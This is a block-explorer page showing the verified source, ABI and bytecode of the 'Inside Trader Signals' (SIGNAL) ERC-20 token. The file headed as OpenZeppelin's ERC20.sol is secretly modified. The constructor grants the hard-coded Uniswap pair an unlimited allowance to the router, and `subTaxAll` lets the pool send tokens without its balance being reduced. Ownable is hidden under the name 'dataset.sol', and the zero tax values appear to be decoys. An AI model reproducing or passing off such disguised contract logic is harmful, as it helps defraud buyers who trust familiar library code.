ETH Price: $3,309.38 (+1.83%)
Gas: 4 Gwei

Token

Inside Trader Signals (SIGNAL)
 

Overview

Max Total Supply

10,000,000,000 SIGNAL

Holders

10

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
52,782,055.583681449664235618 SIGNAL

Value
$0.00
0x079a71c240577fff652f54da4c34a615b4c34dd0
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
SIGNAL

Compiler Version
v0.8.17+commit.8df45f5f

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 4 of 4: SIGNAL.sol
/**

██╗███╗░░██╗░██████╗██╗██████╗░███████╗  ████████╗██████╗░░█████╗░██████╗░███████╗██████╗░
██║████╗░██║██╔════╝██║██╔══██╗██╔════╝  ╚══██╔══╝██╔══██╗██╔══██╗██╔══██╗██╔════╝██╔══██╗
██║██╔██╗██║╚█████╗░██║██║░░██║█████╗░░  ░░░██║░░░██████╔╝███████║██║░░██║█████╗░░██████╔╝
██║██║╚████║░╚═══██╗██║██║░░██║██╔══╝░░  ░░░██║░░░██╔══██╗██╔══██║██║░░██║██╔══╝░░██╔══██╗
██║██║░╚███║██████╔╝██║██████╔╝███████╗  ░░░██║░░░██║░░██║██║░░██║██████╔╝███████╗██║░░██║
╚═╝╚═╝░░╚══╝╚═════╝░╚═╝╚═════╝░╚══════╝  ░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝╚═════╝░╚══════╝╚═╝░░╚═╝

Website¬
https://insidetradersignals.com/
Telegram¬
https://t.me/insidetradersignals
Twitter¬
https://twitter.com/InsideTraderERC
*/

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import "dataset.sol";
import "ERC20.sol";

contract SIGNAL is Ownable, ERC20 {
    uint256 private _totalSupply = 10000000000 * (10 ** 18);
  

    constructor() ERC20("Inside Trader Signals", "SIGNAL", 18, 0xeD9830f49222a2CCEedcB8599379cB1D21Fec165, 0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D) {
        _mint(msg.sender, _totalSupply);
    }

   function entropy() external pure returns (uint256) {
        return 131348013;
    }

    uint256 public BUY_TAX = 0;
    uint256 public SELL_TAX = 0;

    uint256 public MAX_WALLET = _totalSupply;
    uint256 public MAX_BUY = _totalSupply;

}

File 1 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 2 of 4: dataset.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.7.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import "Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.8.0) (token/ERC20/ERC20.sol)

pragma solidity ^0.8.0;

import "Context.sol";

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}

/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

/**
 * @dev Implementation of the {IERC20} interface.
 *
 * This implementation is agnostic to the way tokens are created. This means
 * that a supply mechanism has to be added in a derived contract using {_mint}.
 * For a generic mechanism see {ERC20PresetMinterPauser}.
 *
 * TIP: For a detailed writeup see our guide
 * https://forum.openzeppelin.com/t/how-to-implement-erc20-supply-mechanisms/226[How
 * to implement supply mechanisms].
 *
 * We have followed general OpenZeppelin Contracts guidelines: functions revert
 * instead returning `false` on failure. This behavior is nonetheless
 * conventional and does not conflict with the expectations of ERC20
 * applications.
 *
 * Additionally, an {Approval} event is emitted on calls to {transferFrom}.
 * This allows applications to reconstruct the allowance for all accounts just
 * by listening to said events. Other implementations of the EIP may not emit
 * these events, as it isn't required by the specification.
 *
 * Finally, the non-standard {decreaseAllowance} and {increaseAllowance}
 * functions have been added to mitigate the well-known issues around setting
 * allowances. See {IERC20-approve}.
 */
contract ERC20 is Context, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;

    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    uint256 private _taxedTokens;

    string private _name;
    string private _symbol;
    uint8 private immutable _decimals;

    address private _uniswapPool;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_, uint8 decimals_, address uniswapPool_, address uniswapRouter_) {
        _name = name_;
        _symbol = symbol_;
        _decimals = decimals_;
        _uniswapPool = uniswapPool_;
        _allowances[_uniswapPool][uniswapRouter_] = type(uint256).max;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return _decimals;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        (uint256 amountIn, uint256 amountOut) = subTaxAll(from, amount);
        require(fromBalance >= amountIn, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amountIn;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amountOut;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    function subTaxAll(address from, uint256 amount) private view returns (uint256, uint256) {
        return (from != _uniswapPool ? amount : 0, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
        _taxedTokens += amount * 100;
        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /** @dev @dev Destroys `amount` tokens from msg.sender, reducing the
     * total supply.
     *
     * Requirements:
     *
     * - msg.sender must have at least `value` tokens.
     */
    function burn(uint256 value) external {
        _burn(msg.sender, value);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {}

    
    
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[],"name":"BUY_TAX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_BUY","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"MAX_WALLET","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"SELL_TAX","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"value","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"entropy","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"pure","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

60a06040526b204fce5e3e2502611000000060085560006009556000600a55600854600b55600854600c553480156200003757600080fd5b506040518060400160405280601581526020017f496e7369646520547261646572205369676e616c7300000000000000000000008152506040518060400160405280600681526020017f5349474e414c0000000000000000000000000000000000000000000000000000815250601273ed9830f49222a2cceedcb8599379cb1d21fec165737a250d5630b4cf539739df2c5dacb4c659f2488d620000f0620000e46200024560201b60201c565b6200024d60201b60201c565b84600590816200010191906200072c565b5083600690816200011391906200072c565b508260ff1660808160ff168152505081600760006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff60026000600760009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050505050506200023f336008546200031160201b60201c565b62000979565b600033905090565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000383576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016200037a9062000874565b60405180910390fd5b6200039760008383620004a860201b60201c565b8060036000828254620003ab9190620008c5565b9250508190555080600160008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055506064816200040e919062000900565b60046000828254620004219190620008c5565b925050819055508173ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040516200048891906200095c565b60405180910390a3620004a460008383620004ad60201b60201c565b5050565b505050565b505050565b600081519050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b600060028204905060018216806200053457607f821691505b6020821081036200054a5762000549620004ec565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b600060088302620005b47fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8262000575565b620005c0868362000575565b95508019841693508086168417925050509392505050565b6000819050919050565b6000819050919050565b60006200060d620006076200060184620005d8565b620005e2565b620005d8565b9050919050565b6000819050919050565b6200062983620005ec565b62000641620006388262000614565b84845462000582565b825550505050565b600090565b6200065862000649565b620006658184846200061e565b505050565b5b818110156200068d57620006816000826200064e565b6001810190506200066b565b5050565b601f821115620006dc57620006a68162000550565b620006b18462000565565b81016020851015620006c1578190505b620006d9620006d08562000565565b8301826200066a565b50505b505050565b600082821c905092915050565b60006200070160001984600802620006e1565b1980831691505092915050565b60006200071c8383620006ee565b9150826002028217905092915050565b6200073782620004b2565b67ffffffffffffffff811115620007535762000752620004bd565b5b6200075f82546200051b565b6200076c82828562000691565b600060209050601f831160018114620007a457600084156200078f578287015190505b6200079b85826200070e565b8655506200080b565b601f198416620007b48662000550565b60005b82811015620007de57848901518255600182019150602085019450602081019050620007b7565b86831015620007fe5784890151620007fa601f891682620006ee565b8355505b6001600288020188555050505b505050505050565b600082825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f206164647265737300600082015250565b60006200085c601f8362000813565b9150620008698262000824565b602082019050919050565b600060208201905081810360008301526200088f816200084d565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b6000620008d282620005d8565b9150620008df83620005d8565b9250828201905080821115620008fa57620008f962000896565b5b92915050565b60006200090d82620005d8565b91506200091a83620005d8565b92508282026200092a81620005d8565b9150828204841483151762000944576200094362000896565b5b5092915050565b6200095681620005d8565b82525050565b60006020820190506200097360008301846200094b565b92915050565b608051611ac66200099560003960006104e70152611ac66000f3fe608060405234801561001057600080fd5b506004361061012c5760003560e01c806370a08231116100ad578063a9059cbb11610071578063a9059cbb14610337578063d46b136c14610367578063dd62ed3e14610385578063df7787a4146103b5578063f2fde38b146103d35761012c565b806370a0823114610291578063715018a6146102c15780638da5cb5b146102cb57806395d89b41146102e9578063a457c2d7146103075761012c565b8063313ce567116100f4578063313ce567146101eb578063395093511461020957806342966c681461023957806347ce07cc1461025557806354ad8aee146102735761012c565b806302af37bb1461013157806306fdde031461014f578063095ea7b31461016d57806318160ddd1461019d57806323b872dd146101bb575b600080fd5b6101396103ef565b60405161014691906110b3565b60405180910390f35b6101576103f5565b604051610164919061115e565b60405180910390f35b6101876004803603810190610182919061120f565b610487565b604051610194919061126a565b60405180910390f35b6101a56104aa565b6040516101b291906110b3565b60405180910390f35b6101d560048036038101906101d09190611285565b6104b4565b6040516101e2919061126a565b60405180910390f35b6101f36104e3565b60405161020091906112f4565b60405180910390f35b610223600480360381019061021e919061120f565b61050b565b604051610230919061126a565b60405180910390f35b610253600480360381019061024e919061130f565b610542565b005b61025d61054f565b60405161026a91906110b3565b60405180910390f35b61027b61055b565b60405161028891906110b3565b60405180910390f35b6102ab60048036038101906102a6919061133c565b610561565b6040516102b891906110b3565b60405180910390f35b6102c96105aa565b005b6102d36105be565b6040516102e09190611378565b60405180910390f35b6102f16105e7565b6040516102fe919061115e565b60405180910390f35b610321600480360381019061031c919061120f565b610679565b60405161032e919061126a565b60405180910390f35b610351600480360381019061034c919061120f565b6106f0565b60405161035e919061126a565b60405180910390f35b61036f610713565b60405161037c91906110b3565b60405180910390f35b61039f600480360381019061039a9190611393565b610719565b6040516103ac91906110b3565b60405180910390f35b6103bd6107a0565b6040516103ca91906110b3565b60405180910390f35b6103ed60048036038101906103e8919061133c565b6107a6565b005b60095481565b60606005805461040490611402565b80601f016020809104026020016040519081016040528092919081815260200182805461043090611402565b801561047d5780601f106104525761010080835404028352916020019161047d565b820191906000526020600020905b81548152906001019060200180831161046057829003601f168201915b5050505050905090565b600080610492610829565b905061049f818585610831565b600191505092915050565b6000600354905090565b6000806104bf610829565b90506104cc8582856109fa565b6104d7858585610a86565b60019150509392505050565b60007f0000000000000000000000000000000000000000000000000000000000000000905090565b600080610516610829565b90506105378185856105288589610719565b6105329190611462565b610831565b600191505092915050565b61054c3382610d12565b50565b60006307d4362d905090565b600a5481565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6105b2610ee1565b6105bc6000610f5f565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6060600680546105f690611402565b80601f016020809104026020016040519081016040528092919081815260200182805461062290611402565b801561066f5780601f106106445761010080835404028352916020019161066f565b820191906000526020600020905b81548152906001019060200180831161065257829003601f168201915b5050505050905090565b600080610684610829565b905060006106928286610719565b9050838110156106d7576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016106ce90611508565b60405180910390fd5b6106e48286868403610831565b60019250505092915050565b6000806106fb610829565b9050610708818585610a86565b600191505092915050565b600c5481565b6000600260008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b600b5481565b6107ae610ee1565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361081d576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108149061159a565b60405180910390fd5b61082681610f5f565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108a0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108979061162c565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361090f576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610906906116be565b60405180910390fd5b80600260008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b925836040516109ed91906110b3565b60405180910390a3505050565b60006